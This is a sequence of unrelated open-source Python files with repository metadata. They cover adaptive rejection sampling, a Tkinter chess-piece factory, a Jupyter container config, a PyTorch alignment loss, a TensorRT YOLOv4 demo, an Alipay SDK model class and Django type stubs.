hus[jj] = hpxs[jj] * (zs[jj] - xs[jj]) + hxs[jj]
# Calculate cu and scum
if isDomainFinite[0]:
scum[0] = (
1.0
/ hpxs[0]
* (numpy.exp(hus[0]) - numpy.exp(hpxs[0] * (domain[0] - xs[0]) + hxs[0]))
)
else:
scum[0] = 1.0 / hpxs[0] * numpy.exp(hus[0])
if nx > 2:
for jj in range(nx - 2):
if hpxs[jj + 1] == 0.0:
scum[jj + 1] = (zs[jj + 1] - zs[jj]) * numpy.exp(hxs[jj + 1])
else:
scum[jj + 1] = (
1.0 / hpxs[jj + 1] * (numpy.exp(hus[jj + 1]) - numpy.exp(hus[jj]))
)
if isDomainFinite[1]:
cu = (
1.0
/ hpxs[nx - 1]
* (
numpy.exp(hpxs[nx - 1] * (domain[1] - xs[nx - 1]) + hxs[nx - 1])
- numpy.exp(hus[nx - 2])
)
)
else:
cu = -1.0 / hpxs[nx - 1] * numpy.exp(hus[nx - 2])
cu = cu + numpy.sum(scum)
scum = numpy.cumsum(scum) / cu
out = []
out.append(cu)
out.append(xs)
out.append(hxs)
out.append(hpxs)
out.append(zs)
out.append(scum)
out.append(hus)
return out
def sampleone(hull, hx, hpx, domain, isDomainFinite, maxn, nupdates, hxparams):
"""sampleone: sample one point by ars
Input:
hull - the hull (see doc of setup_hull for definition)
hx - function that evaluates h(x)
hpx - function that evaluates hp(x)
domain - [.,.] upper and lower limit to the domain
isDomainFinite - [.,.] is there a lower/upper limit to the domain?
maxn - maximum number of updates to the hull
nupdates - number of updates to the hull that have occurred
hxparams - tuple of parameters for h(x) and h'(x)
Output:
a sample
a new hull
nupdates
History:
2009-05-21 - Written - Bovy (NYU)
"""
thishull = hull
noSampleYet = True
while noSampleYet:
# Sample a candidate from the upper hull
candidate = sample_hull(thishull, domain, isDomainFinite)
thishux, thishlx = evaluate_hull(candidate, thishull)
u = stats.uniform.rvs()
if u < numpy.exp(thishlx - thishux):
thissample = candidate
noSampleYet = False
else:
thishx = hx(candidate, hxparams)
if u < numpy.exp(thishx - thishux):
thissample = candidate
noSampleYet = False
if nupdates < maxn:
thishpx = hpx(candidate, hxparams)
thishull = update_hull(
thishull, candidate, thishx, thishpx, domain, isDomainFinite
)
nupdates = nupdates + 1
return thissample, thishull, nupdates
def sample_hull(hull, domain, isDomainFinite):
"""sample_hull: Sample the upper hull
Input:
hull - hull structure (see setup_hull for a definition of this)
domain - [.,.] upper and lower limit to the domain
isDomainFinite - [.,.] is there a lower/upper limit to the domain?
Output:
a sample from the hull
History:
2009-05-21 - Written - Bovy
"""
u = stats.uniform.rvs()
# Find largest zs[jj] such that scum[jj] < u
# The first bin is a special case
if hull[5][0] >= u:
if hull[3][0] == 0:
if isDomainFinite[0]:
thissample = domain[0] + u / hull[5][0] * (hull[4][0] - domain[0])
else:
thissample = 100000000 # Throw some kind of error
else:
thissample = hull[4][0] + 1.0 / hull[3][0] * numpy.log(
1.0 - hull[3][0] * hull[0] * (hull[5][0] - u) / numpy.exp(hull[6][0])
)
else:
if len(hull[5]) == 1:
indx = 0
else:
indx = 1
while indx < len(hull[5]) and hull[5][indx] < u:
indx = indx + 1
indx = indx - 1
if numpy.fabs(hull[3][indx + 1]) == 0:
if indx != (len(hull[5]) - 1):
thissample = hull[4][indx] + (u - hull[5][indx]) / (
hull[5][indx + 1] - hull[5][indx]
) * (hull[4][indx + 1] - hull[4][indx])
else:
if isDomainFinite[1]:
thissample = hull[4][indx] + (u - hull[5][indx]) / (
1.0 - hull[5][indx]
) * (domain[1] - hull[4][indx])
else:
thissample = 100000 # Throw some kind of error
else:
thissample = hull[4][indx] + 1.0 / hull[3][indx + 1] * numpy.log(
1.0
+ hull[3][indx + 1]
* hull[0]
* (u - hull[5][indx])
/ numpy.exp(hull[6][indx])
)
return thissample
def evaluate_hull(x, hull):
"""evaluate_hull: evaluate h_u(x) and (optional) h_l(x)
Input:
x - abcissa
hull - the hull (see setup_hull for a definition)
Output:
hu(x) (optional), hl(x)
History:
2009-05-21 - Written - Bovy (NYU)
"""
# Find in which [z_{i-1},z_i] interval x lies
if x < hull[4][0]:
# x lies in the first interval
hux = hull[3][0] * (x - hull[1][0]) + hull[2][0]
indx = 0
else:
if len(hull[5]) == 1:
# There are only two intervals
indx = 1
else:
indx = 1
while indx < len(hull[4]) and hull[4][indx] < x:
indx = indx + 1
indx = indx - 1
hux = hull[3][indx] * (x - hull[1][indx]) + hull[2][indx]
# Now evaluate hlx
neginf = numpy.finfo(numpy.dtype(numpy.float64)).min
if x < hull[1][0] or x > hull[1][-1]:
hlx = neginf
else:
if indx == 0:
hlx = ((hull[1][1] - x) * hull[2][0] + (x - hull[1][0]) * hull[2][1]) / (
hull[1][1] - hull[1][0]
)
elif indx == len(hull[4]):
hlx = (
(hull[1][-1] - x) * hull[2][-2] + (x - hull[1][-2]) * hull[2][-1]
) / (hull[1][-1] - hull[1][-2])
elif x < hull[1][indx + 1]:
hlx = (
(hull[1][indx + 1] - x) * hull[2][indx]
+ (x - hull[1][indx]) * hull[2][indx + 1]
) / (hull[1][indx + 1] - hull[1][indx])
else:
hlx = (
(hull[1][indx + 2] - x) * hull[2][indx + 1]
+ (x - hull[1][indx + 1]) * hull[2][indx + 2]
) / (hull[1][indx + 2] - hull[1][indx + 1])
return hux, hlx
def update_hull(hull, newx, newhx, newhpx, domain, isDomainFinite):
"""update_hull: update the hull with a new function evaluation
Input:
hull - the current hull (see setup_hull for a definition)
newx - a new abcissa
newhx - h(newx)
newhpx - hp(newx)
domain - [.,.] upper and lower limit to the domain
isDomainFinite - [.,.] is there a lower/upper limit to the domain?
Output:
newhull
History:
2009-05-21 - Written - Bovy (NYU)
"""
# BOVY: Perhaps add a check that newx is sufficiently far from any existing point
# Find where newx fits in with the other xs
if newx > hull[1][-1]:
newxs = numpy.append(hull[1], newx)
newhxs = numpy.append(hull[2], newhx)
newhpxs = numpy.append(hull[3], newhpx)
# new z
newz = (newhx - hull[2][-1] - newx * newhpx + hull[1][-1] * hull[3][-1]) / (
hull[3][-1] - newhpx
)
newzs = numpy.append(hull[4], newz)
# New hu
newhu = hull[3][-1] * (newz - hull[1][-1]) + hull[2][-1]
newhus = numpy.append(hull[6], newhu)
else:
indx = 0
while newx > hull[1][indx]:
indx = indx + 1
newxs = numpy.insert(hull[1], indx, newx)
newhxs = numpy.insert(hull[2], indx, newhx)
newhpxs = numpy.insert(hull[3], indx, newhpx)
# Replace old z with new zs
if newx < hull[1][0]:
newz = (hull[2][0] - newhx - hull[1][0] * hull[3][0] + newx * newhpx) / (
newhpx - hull[3][0]
)
newzs = numpy.insert(hull[4], 0, newz)
# Also add the new hu
newhu = newhpx * (newz - newx) + newhx
newhus = numpy.insert(hull[6], 0, newhu)
else:
newz1 = (
newhx
- hull[2][indx - 1]
- newx * newhpx
+ hull[1][indx - 1] * hull[3][indx - 1]
) / (hull[3][indx - 1] - newhpx)
newz2 = (
hull[2][indx] - newhx - hull[1][indx] * hull[3][indx] + newx * newhpx
) / (newhpx - hull[3][indx])
# Insert newz1 and replace z_old
newzs = numpy.insert(hull[4], indx - 1, newz1)
newzs[indx] = newz2
# Update the hus
newhu1 = hull[3][indx - 1] * (newz1 - hull[1][indx - 1]) + hull[2][indx - 1]
newhu2 = newhpx * (newz2 - newx) + newhx
newhus = numpy.insert(hull[6], indx - 1, newhu1)
newhus[indx] = newhu2
# Recalculate the cumulative sum
nx = len(newxs)
newscum = numpy.zeros(nx - 1)
if isDomainFinite[0]:
newscum[0] = (
1.0
/ newhpxs[0]
* (
numpy.exp(newhus[0])
- numpy.exp(newhpxs[0] * (domain[0] - newxs[0]) + newhxs[0])
)
)
else:
newscum[0] = 1.0 / newhpxs[0] * numpy.exp(newhus[0])
if nx > 2:
for jj in range(nx - 2):
if newhpxs[jj + 1] == 0.0:
newscum[jj + 1] = (newzs[jj + 1] - newzs[jj]) * numpy.exp(
newhxs[jj + 1]
)
else:
newscum[jj + 1] = (
1.0
/ newhpxs[jj + 1]
* (numpy.exp(newhus[jj + 1]) - numpy.exp(newhus[jj]))
)
if isDomainFinite[1]:
newcu = (
1.0
/ newhpxs[nx - 1]
* (
numpy.exp(
newhpxs[nx - 1] * (domain[1] - newxs[nx - 1]) + newhxs[nx - 1]
)
- numpy.exp(newhus[nx - 2])
)
)
else:
newcu = -1.0 / newhpxs[nx - 1] * numpy.exp(newhus[nx - 2])
newcu = newcu + numpy.sum(newscum)
newscum = numpy.cumsum(newscum) / newcu
newhull = []
newhull.append(newcu)
newhull.append(newxs)
newhull.append(newhxs)
newhull.append(newhpxs)
newhull.append(newzs)
newhull.append(newscum)
newhull.append(newhus)
return newhull
|
68a443df7d426bb63c7fdc04bde250bba9b445ed
|
20f125a17856c1251727314c571091a59bc770f0
|
/Chapter 04/4.02/piece.py
|
77f9bbb6f593ec22563b46e2b0509c024b65ca8d
|
[
"MIT"
] |
permissive
|
PacktPublishing/Tkinter-GUI-Application-Development-Blueprints-Second-Edition
|
310983285d54c59bdd02e69b9a913aa9372c869a
|
1e160c0575028e446295c121a84142164ee5ced2
|
refs/heads/master
| 2023-07-10T05:34:39.159752
| 2023-01-30T09:20:16
| 2023-01-30T09:20:16
| 123,231,531
| 142
| 94
|
MIT
| 2023-07-03T23:09:32
| 2018-02-28T04:59:53
|
Python
|
UTF-8
|
Python
| false
| false
| 1,121
|
py
|
piece.py
|
"""
Code illustration: 4.02
@ Tkinter GUI Application Development Blueprints
"""
from configurations import *
import exceptions
def create_piece (piece, color='white'):
if isinstance(piece, str):
if piece.upper() in SHORT_NAME.keys():
color = "white" if piece.isupper() else "black"
piece = SHORT_NAME[piece.upper()]
piece = piece.capitalize()
if piece in SHORT_NAME.values():
return eval("{classname}(color)".format(classname=piece))
raise exceptions.ChessError("invalid piece name: '{}'".format(piece))
class Piece():
def __init__(self, color):
self.name = self.__class__.__name__.lower()
if color == 'black':
self.name = self.name.lower()
elif color == 'white':
self.name = self.name.upper()
self.color = color
def keep_reference(self, model):
self.model = model
class King(Piece):
pass
class Queen(Piece):
pass
class Rook(Piece):
pass
class Bishop(Piece):
pass
class Knight(Piece):
pass
class Pawn(Piece):
pass
|
b55392cb9b7fdd97444e6142995ac63269f81428
|
bbd69601912a3361d788efd03a47f9d4e3bac09e
|
/docs/sphinx/rest_substitutions/snippets/python/converted/wx.propgrid.PGProperty.3.py
|
b7f0f65a052e8169d7d478cf55c358f8807141a1
|
[] |
no_license
|
wxWidgets/Phoenix
|
56929484460a0399a8f1d9582bc77c20aa14748d
|
a1184286703cf24c4b88e5bc14cf2979c1b1ea00
|
refs/heads/master
| 2023-09-01T07:10:17.437093
| 2023-08-31T05:38:01
| 2023-08-31T05:38:01
| 5,078,061
| 2,268
| 677
| null | 2023-09-09T17:06:59
| 2012-07-17T06:22:25
|
Python
|
UTF-8
|
Python
| false
| false
| 49
|
py
|
wx.propgrid.PGProperty.3.py
|
self.SetFlag(wx.propgrid.PG_PROP_NO_ESCAPE)
|
961f61f00e4e454e93c452be088594aaf02b3062
|
d35f84342277856dff06e20bb4a433382f9f7f54
|
/machine-learning-ui/jupyter_notebook_config.py
|
4945cae84d8808ee948ebb9b6e437760cd33aa89
|
[] |
no_license
|
clearlinux/dockerfiles
|
3d7f03f0948e8f9146b55794c2aaa290221d5b23
|
7c37f38dd540da9107854c1dea2609340978ba2d
|
refs/heads/master
| 2022-12-28T15:31:30.529825
| 2022-09-30T23:20:10
| 2022-09-30T23:20:10
| 66,385,562
| 158
| 262
| null | 2021-12-17T16:30:23
| 2016-08-23T16:48:27
|
Shell
|
UTF-8
|
Python
| false
| false
| 178
|
py
|
jupyter_notebook_config.py
|
c = get_config()
c.ContentsManager.root_dir = "/root/"
c.NotebookApp.allow_root = True
c.NotebookApp.ip = '0.0.0.0'
c.NotebookApp.open_browser = False
c.NotebookApp.port = 8888
|
9a57adaf556646a0caa64f27e8cc8e1300a2b5bf
|
5f1881006aaf4f3c2515f375ad29c15fd6612de2
|
/interactive_text_to_sql/src/loss.py
|
321ed87275f1bb64708930b5e706b0fd4f67acf6
|
[
"MIT",
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-proprietary-license",
"LicenseRef-scancode-free-unknown",
"LicenseRef-scancode-unknown-license-reference",
"LGPL-2.1-or-later",
"Apache-2.0",
"LicenseRef-scancode-public-domain",
"BSD-2-Clause"
] |
permissive
|
microsoft/ContextualSP
|
4edb598d40f683f9a1143b92a9d24e1066d51ec4
|
4198ebce942f4afe7ddca6a96ab6f4464ade4518
|
refs/heads/master
| 2023-08-02T22:08:40.503853
| 2023-07-14T07:22:50
| 2023-07-14T07:22:50
| 255,534,819
| 332
| 70
|
MIT
| 2023-07-25T19:23:48
| 2020-04-14T07:01:54
|
Python
|
UTF-8
|
Python
| false
| false
| 5,515
|
py
|
loss.py
|
# coding: utf-8
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from src.utils.algo_utils import BipartiteGraphSolver
class HingeLoss(nn.Module):
def __init__(self, margin=0.6, aggregation='max', l1_norm_weight=0, entropy_norm_weight=0):
super(HingeLoss, self).__init__()
self.margin = margin
self.aggregation = aggregation
self.l1_norm_weight = l1_norm_weight
self.entropy_norm_weight = entropy_norm_weight
self.bipartite_graph_solver = BipartiteGraphSolver()
def forward(self, pos_align, neg_align, lengths):
# src_lengths, pos_tgt_lengths, neg_tgt_lengths = lengths
positive_lengths, negative_lengths = lengths
positive_lengths = positive_lengths.permute(1, 0)
negative_lengths = negative_lengths.permute(1, 0)
src_lengths = positive_lengths[0]
pos_tgt_lengths = positive_lengths[1]
neg_tgt_lengths = negative_lengths[1]
'''
temp = torch.sqrt(torch.FloatTensor([self.args.hidden_size * 2]))
if self.args.cuda:
temp = temp.cuda()
pos_align = torch.div(pos_align, temp)
neg_align = torch.div(neg_align, temp)
'''
# print('pos_align', pos_align)
# print('neg_align', neg_align)
positive_n = sum(positive_lengths[0] * positive_lengths[1])
negative_n = sum(negative_lengths[1] * negative_lengths[1])
pos_l1_norm, neg_l1_norm = torch.norm(pos_align, p=1) / positive_n, torch.norm(neg_align, p=1) / negative_n
# print('pos_norm', type(pos_l1_norm), pos_l1_norm)
# print('neg_norm', type(neg_l1_norm), neg_l1_norm)
# print('pos_norm', pos_align)
# print('neg_norm', neg_align)
# Entropy loss
pos_row_entropy = F.softmax(pos_align, dim=-1) * F.log_softmax(pos_align, dim=-1)
neg_row_entropy = F.softmax(neg_align, dim=-1) * F.log_softmax(neg_align, dim=-1)
pos_row_entropy = -1 * pos_row_entropy.sum()
neg_row_entropy = -1 * neg_row_entropy.sum()
pos_col_entropy = F.softmax(pos_align, dim=0) * F.log_softmax(pos_align, dim=0)
neg_col_entropy = F.softmax(neg_align, dim=0) * F.log_softmax(neg_align, dim=0)
pos_col_entropy = -1 * pos_col_entropy.sum()
neg_col_entropy = -1 * neg_col_entropy.sum()
entropy_norm = pos_row_entropy - neg_row_entropy + pos_col_entropy - neg_col_entropy
# print('entropy', type(entropy_norm), entropy_norm)
if self.aggregation == 'max':
pos_align_score, neg_align_score = torch.max(pos_align, -1)[0], torch.max(neg_align, -1)[0]
elif self.aggregation == 'sum':
pos_align_score, neg_align_score = torch.sum(pos_align, -1), torch.sum(neg_align, -1)
pos_align_score = torch.div(pos_align_score, src_lengths.float().reshape((-1, 1)))
neg_align_score = torch.div(neg_align_score, src_lengths.float().reshape((-1, 1)))
elif self.aggregation == 'match':
pos_align_score = 0
pos_matrix = [x.detach().cpu().numpy() for x in pos_align]
pos_assignment_positions = [self.bipartite_graph_solver.find_max(x)[1] for x in pos_matrix]
for idx, pos_assignment_position in enumerate(pos_assignment_positions):
for x, y in zip(*pos_assignment_position):
pos_align_score += pos_align[idx, x, y]
pos_align_score /= sum(positive_lengths[0])
# pos_assignment = [list(zip([i] * len(pos_assignment_positions[0][0]),
# pos_assignment_positions[i][0],
# pos_assignment_positions[i][1]))
# for i in range(len(pos_assignment_positions))]
# pos_assignment = [_ for x in pos_assignment for _ in x]
neg_align_score = 0
neg_matrix = [x.detach().cpu().numpy() for x in neg_align]
neg_assignment_positions = [self.bipartite_graph_solver.find_max(x)[1] for x in neg_matrix]
for idx, neg_assignment_position in enumerate(neg_assignment_positions):
for x, y in zip(*neg_assignment_position):
neg_align_score += neg_align[idx, x, y]
neg_align_score /= sum(negative_lengths[0])
pass
# neg_assignment = [list(zip([i] * len(neg_assignment_positions[0][0]),
# neg_assignment_positions[i][0],
# neg_assignment_positions[i][1]))
# for i in range(len(neg_assignment_positions))]
# neg_assignment = [_ for x in neg_assignment for _ in x]
# pos_align_score = sum([pos_align[point] for point in pos_assignment])
# neg_align_score = sum([neg_align[point] for point in neg_assignment])
else:
raise ValueError("Hinge loss only supports max/sum aggregation.")
pos_align_score = torch.sum(pos_align_score, -1)
neg_align_score = torch.sum(neg_align_score, -1)
pos_align_score = torch.div(pos_align_score, pos_tgt_lengths.float())
neg_align_score = torch.div(neg_align_score, neg_tgt_lengths.float())
hinge_loss = torch.mean(torch.clamp(self.margin - (pos_align_score - neg_align_score), min=0.0)) + \
self.l1_norm_weight * (pos_l1_norm + neg_l1_norm) + self.entropy_norm_weight * entropy_norm
return hinge_loss
|
86d20c146bf3ae8e4766a09dfa93311a0ab2b6a6
|
5a52ccea88f90dd4f1acc2819997fce0dd5ffb7d
|
/alipay/aop/api/domain/KoubeiRetailWmsWarehouseQueryModel.py
|
0563209f7007070edfd9ebf9446b4b27ddd92894
|
[
"Apache-2.0"
] |
permissive
|
alipay/alipay-sdk-python-all
|
8bd20882852ffeb70a6e929038bf88ff1d1eff1c
|
1fad300587c9e7e099747305ba9077d4cd7afde9
|
refs/heads/master
| 2023-08-27T21:35:01.778771
| 2023-08-23T07:12:26
| 2023-08-23T07:12:26
| 133,338,689
| 247
| 70
|
Apache-2.0
| 2023-04-25T04:54:02
| 2018-05-14T09:40:54
|
Python
|
UTF-8
|
Python
| false
| false
| 4,122
|
py
|
KoubeiRetailWmsWarehouseQueryModel.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.OperateContext import OperateContext
class KoubeiRetailWmsWarehouseQueryModel(object):
def __init__(self):
self._city_code = None
self._operate_context = None
self._own_type = None
self._owner_id = None
self._page_no = None
self._page_size = None
self._warehouse_code = None
@property
def city_code(self):
return self._city_code
@city_code.setter
def city_code(self, value):
self._city_code = value
@property
def operate_context(self):
return self._operate_context
@operate_context.setter
def operate_context(self, value):
if isinstance(value, OperateContext):
self._operate_context = value
else:
self._operate_context = OperateContext.from_alipay_dict(value)
@property
def own_type(self):
return self._own_type
@own_type.setter
def own_type(self, value):
self._own_type = value
@property
def owner_id(self):
return self._owner_id
@owner_id.setter
def owner_id(self, value):
self._owner_id = value
@property
def page_no(self):
return self._page_no
@page_no.setter
def page_no(self, value):
self._page_no = value
@property
def page_size(self):
return self._page_size
@page_size.setter
def page_size(self, value):
self._page_size = value
@property
def warehouse_code(self):
return self._warehouse_code
@warehouse_code.setter
def warehouse_code(self, value):
self._warehouse_code = value
def to_alipay_dict(self):
params = dict()
if self.city_code:
if hasattr(self.city_code, 'to_alipay_dict'):
params['city_code'] = self.city_code.to_alipay_dict()
else:
params['city_code'] = self.city_code
if self.operate_context:
if hasattr(self.operate_context, 'to_alipay_dict'):
params['operate_context'] = self.operate_context.to_alipay_dict()
else:
params['operate_context'] = self.operate_context
if self.own_type:
if hasattr(self.own_type, 'to_alipay_dict'):
params['own_type'] = self.own_type.to_alipay_dict()
else:
params['own_type'] = self.own_type
if self.owner_id:
if hasattr(self.owner_id, 'to_alipay_dict'):
params['owner_id'] = self.owner_id.to_alipay_dict()
else:
params['owner_id'] = self.owner_id
if self.page_no:
if hasattr(self.page_no, 'to_alipay_dict'):
params['page_no'] = self.page_no.to_alipay_dict()
else:
params['page_no'] = self.page_no
if self.page_size:
if hasattr(self.page_size, 'to_alipay_dict'):
params['page_size'] = self.page_size.to_alipay_dict()
else:
params['page_size'] = self.page_size
if self.warehouse_code:
if hasattr(self.warehouse_code, 'to_alipay_dict'):
params['warehouse_code'] = self.warehouse_code.to_alipay_dict()
else:
params['warehouse_code'] = self.warehouse_code
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = KoubeiRetailWmsWarehouseQueryModel()
if 'city_code' in d:
o.city_code = d['city_code']
if 'operate_context' in d:
o.operate_context = d['operate_context']
if 'own_type' in d:
o.own_type = d['own_type']
if 'owner_id' in d:
o.owner_id = d['owner_id']
if 'page_no' in d:
o.page_no = d['page_no']
if 'page_size' in d:
o.page_size = d['page_size']
if 'warehouse_code' in d:
o.warehouse_code = d['warehouse_code']
return o
|
924df92b9dc49ff124a0e07110337fb4de72d08c
|
1fbee8652452fb9d12ff499433b23e4b57782c59
|
/demo_trt.py
|
7f096639d21823922f5e889a1fac5f9c2d9e6a24
|
[
"Apache-2.0"
] |
permissive
|
Tianxiaomo/pytorch-YOLOv4
|
9301a83b85c610dfdfb99f2cb0ea2ea35fe6f660
|
a65d219f9066bae4e12003bd7cdc04531860c672
|
refs/heads/master
| 2023-09-02T04:40:58.172157
| 2021-12-12T12:11:07
| 2021-12-12T12:11:07
| 258,745,062
| 4,831
| 1,672
|
Apache-2.0
| 2023-07-23T13:20:24
| 2020-04-25T10:11:33
|
Python
|
UTF-8
|
Python
| false
| false
| 7,191
|
py
|
demo_trt.py
|
import sys
import os
import time
import argparse
import numpy as np
import cv2
# from PIL import Image
import tensorrt as trt
import pycuda.driver as cuda
import pycuda.autoinit
from tool.utils import *
try:
# Sometimes python2 does not understand FileNotFoundError
FileNotFoundError
except NameError:
FileNotFoundError = IOError
def GiB(val):
return val * 1 << 30
def find_sample_data(description="Runs a TensorRT Python sample", subfolder="", find_files=[]):
'''
Parses sample arguments.
Args:
description (str): Description of the sample.
subfolder (str): The subfolder containing data relevant to this sample
find_files (str): A list of filenames to find. Each filename will be replaced with an absolute path.
Returns:
str: Path of data directory.
Raises:
FileNotFoundError
'''
# Standard command-line arguments for all samples.
kDEFAULT_DATA_ROOT = os.path.join(os.sep, "usr", "src", "tensorrt", "data")
parser = argparse.ArgumentParser(description=description, formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument("-d", "--datadir", help="Location of the TensorRT sample data directory.", default=kDEFAULT_DATA_ROOT)
args, unknown_args = parser.parse_known_args()
# If data directory is not specified, use the default.
data_root = args.datadir
# If the subfolder exists, append it to the path, otherwise use the provided path as-is.
subfolder_path = os.path.join(data_root, subfolder)
data_path = subfolder_path
if not os.path.exists(subfolder_path):
print("WARNING: " + subfolder_path + " does not exist. Trying " + data_root + " instead.")
data_path = data_root
# Make sure data directory exists.
if not (os.path.exists(data_path)):
raise FileNotFoundError(data_path + " does not exist. Please provide the correct data path with the -d option.")
# Find all requested files.
for index, f in enumerate(find_files):
find_files[index] = os.path.abspath(os.path.join(data_path, f))
if not os.path.exists(find_files[index]):
raise FileNotFoundError(find_files[index] + " does not exist. Please provide the correct data path with the -d option.")
return data_path, find_files
# Simple helper data class that's a little nicer to use than a 2-tuple.
class HostDeviceMem(object):
def __init__(self, host_mem, device_mem):
self.host = host_mem
self.device = device_mem
def __str__(self):
return "Host:\n" + str(self.host) + "\nDevice:\n" + str(self.device)
def __repr__(self):
return self.__str__()
# Allocates all buffers required for an engine, i.e. host/device inputs/outputs.
def allocate_buffers(engine, batch_size):
inputs = []
outputs = []
bindings = []
stream = cuda.Stream()
for binding in engine:
size = trt.volume(engine.get_binding_shape(binding)) * batch_size
dims = engine.get_binding_shape(binding)
# in case batch dimension is -1 (dynamic)
if dims[0] < 0:
size *= -1
dtype = trt.nptype(engine.get_binding_dtype(binding))
# Allocate host and device buffers
host_mem = cuda.pagelocked_empty(size, dtype)
device_mem = cuda.mem_alloc(host_mem.nbytes)
# Append the device buffer to device bindings.
bindings.append(int(device_mem))
# Append to the appropriate list.
if engine.binding_is_input(binding):
inputs.append(HostDeviceMem(host_mem, device_mem))
else:
outputs.append(HostDeviceMem(host_mem, device_mem))
return inputs, outputs, bindings, stream
# This function is generalized for multiple inputs/outputs.
# inputs and outputs are expected to be lists of HostDeviceMem objects.
def do_inference(context, bindings, inputs, outputs, stream):
# Transfer input data to the GPU.
[cuda.memcpy_htod_async(inp.device, inp.host, stream) for inp in inputs]
# Run inference.
context.execute_async(bindings=bindings, stream_handle=stream.handle)
# Transfer predictions back from the GPU.
[cuda.memcpy_dtoh_async(out.host, out.device, stream) for out in outputs]
# Synchronize the stream
stream.synchronize()
# Return only the host outputs.
return [out.host for out in outputs]
TRT_LOGGER = trt.Logger()
def main(engine_path, image_path, image_size):
with get_engine(engine_path) as engine, engine.create_execution_context() as context:
buffers = allocate_buffers(engine, 1)
IN_IMAGE_H, IN_IMAGE_W = image_size
context.set_binding_shape(0, (1, 3, IN_IMAGE_H, IN_IMAGE_W))
image_src = cv2.imread(image_path)
num_classes = 80
for i in range(2): # This 'for' loop is for speed check
# Because the first iteration is usually longer
boxes = detect(context, buffers, image_src, image_size, num_classes)
if num_classes == 20:
namesfile = 'data/voc.names'
elif num_classes == 80:
namesfile = 'data/coco.names'
else:
namesfile = 'data/names'
class_names = load_class_names(namesfile)
plot_boxes_cv2(image_src, boxes[0], savename='predictions_trt.jpg', class_names=class_names)
def get_engine(engine_path):
# If a serialized engine exists, use it instead of building an engine.
print("Reading engine from file {}".format(engine_path))
with open(engine_path, "rb") as f, trt.Runtime(TRT_LOGGER) as runtime:
return runtime.deserialize_cuda_engine(f.read())
def detect(context, buffers, image_src, image_size, num_classes):
IN_IMAGE_H, IN_IMAGE_W = image_size
ta = time.time()
# Input
resized = cv2.resize(image_src, (IN_IMAGE_W, IN_IMAGE_H), interpolation=cv2.INTER_LINEAR)
img_in = cv2.cvtColor(resized, cv2.COLOR_BGR2RGB)
img_in = np.transpose(img_in, (2, 0, 1)).astype(np.float32)
img_in = np.expand_dims(img_in, axis=0)
img_in /= 255.0
img_in = np.ascontiguousarray(img_in)
print("Shape of the network input: ", img_in.shape)
# print(img_in)
inputs, outputs, bindings, stream = buffers
print('Length of inputs: ', len(inputs))
inputs[0].host = img_in
trt_outputs = do_inference(context, bindings=bindings, inputs=inputs, outputs=outputs, stream=stream)
print('Len of outputs: ', len(trt_outputs))
trt_outputs[0] = trt_outputs[0].reshape(1, -1, 1, 4)
trt_outputs[1] = trt_outputs[1].reshape(1, -1, num_classes)
tb = time.time()
print('-----------------------------------')
print(' TRT inference time: %f' % (tb - ta))
print('-----------------------------------')
boxes = post_processing(img_in, 0.4, 0.6, trt_outputs)
return boxes
if __name__ == '__main__':
engine_path = sys.argv[1]
image_path = sys.argv[2]
if len(sys.argv) < 4:
image_size = (416, 416)
elif len(sys.argv) < 5:
image_size = (int(sys.argv[3]), int(sys.argv[3]))
else:
image_size = (int(sys.argv[3]), int(sys.argv[4]))
main(engine_path, image_path, image_size)
|
650039535f4d77b2f8dc7557b5f62f74e3667005
|
2ad93a1cf25a580fe980482d2d17a657de3b2523
|
/django-stubs/db/utils.pyi
|
a04919a5e92e615590e28cf7dee6551d53feb24c
|
[
"MIT"
] |
permissive
|
typeddjango/django-stubs
|
f35dfcb001e54694a0a1e8c0afcc6e6a3d130c32
|
0117348c3c7713f25f96b46e53ebdeed7bdba544
|
refs/heads/master
| 2023-08-25T19:42:52.707151
| 2023-08-23T15:13:25
| 2023-08-23T15:13:25
| 142,779,680
| 1,133
| 376
|
MIT
| 2023-09-13T19:05:06
| 2018-07-29T17:08:50
|
Python
|
UTF-8
|
Python
| false
| false
| 2,061
|
pyi
|
utils.pyi
|
from collections.abc import Iterable
from types import TracebackType
from typing import Any
from django.apps import AppConfig
from django.db.backends.base.base import BaseDatabaseWrapper
from django.db.models import Model
from django.utils.connection import BaseConnectionHandler
DEFAULT_DB_ALIAS: str
DJANGO_VERSION_PICKLE_KEY: str
class Error(Exception): ...
class InterfaceError(Error): ...
class DatabaseError(Error): ...
class DataError(DatabaseError): ...
class OperationalError(DatabaseError): ...
class IntegrityError(DatabaseError): ...
class InternalError(DatabaseError): ...
class ProgrammingError(DatabaseError): ...
class NotSupportedError(DatabaseError): ...
class DatabaseErrorWrapper:
def __init__(self, wrapper: Any) -> None: ...
def __enter__(self) -> None: ...
def __exit__(
self,
exc_type: type[BaseException] | None,
exc_value: BaseException | None,
exc_tb: TracebackType | None,
) -> None: ...
def load_backend(backend_name: str) -> Any: ...
class ConnectionHandler(BaseConnectionHandler[BaseDatabaseWrapper]):
@property
def databases(self) -> dict[str, dict[str, Any]]: ...
def ensure_defaults(self, alias: str) -> None: ...
def prepare_test_settings(self, alias: str) -> None: ...
def create_connection(self, alias: str) -> BaseDatabaseWrapper: ...
def close_all(self) -> None: ...
class ConnectionRouter:
def __init__(self, routers: Iterable[Any] | None = ...) -> None: ...
@property
def routers(self) -> list[Any]: ...
def db_for_read(self, model: type[Model], **hints: Any) -> str: ...
def db_for_write(self, model: type[Model], **hints: Any) -> str: ...
def allow_relation(self, obj1: Model, obj2: Model, **hints: Any) -> bool: ...
def allow_migrate(self, db: str, app_label: str, **hints: Any) -> bool: ...
def allow_migrate_model(self, db: str, model: type[Model]) -> bool: ...
def get_migratable_models(
self, app_config: AppConfig, db: str, include_auto_created: bool = ...
) -> list[type[Model]]: ...
|
255cad0c2701319ae4c1f9d71a6b64bde50f05a2
|
ead6ec54c304046e8017289ecae2acb69f2e463d
|
/flotilla/datapackage.py
|
e24daa23ebd2e3e0bb9ccdca81e9fb2a750f3381
|
[] |
permissive
|
YeoLab/flotilla
|
93e3576002f1b51917bc8576897d399176e1fa3a
|
31da64567e59003c2b9c03fc8f4eb27ee62e299c
|
refs/heads/master
| 2023-04-28T04:23:30.408159
